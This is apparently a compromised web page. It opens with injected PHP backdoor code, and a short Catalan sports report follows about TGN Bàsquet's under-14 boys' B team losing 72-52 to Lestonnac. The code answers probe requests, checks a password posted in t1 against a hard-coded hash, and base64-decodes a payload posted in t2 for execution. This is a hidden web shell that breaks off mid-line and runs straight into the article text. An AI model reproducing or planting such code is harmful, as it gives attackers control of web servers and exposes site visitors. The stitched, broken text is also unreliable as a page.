function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil masculí B no fa un bon inici de partit i perd contra Lestonnac (72-52) - Tgn Bàsquet Club -

L’infantil masculí B no fa un bon inici de partit i perd contra Lestonnac (72-52)

Updated: maig 21, 2019

L’infantil masculí B va perdre contra Lestonnac en un partit que va estar marcat pel mal inici dels visitants. El TGN Bàsquet va encaixar un parcial d’11-0 en els primers cinc minuts i a partir d’aleshores sempre va anar a remolc. El partit va ser molt físic i els locals ho van aprofitar per córrer el contraatac constantment. Els liles van contrarestar a còpia de defensa i uns contra un en atac però sense poder retallar un desavantatge que era de 18 punts després dels primers deu minuts (24-6).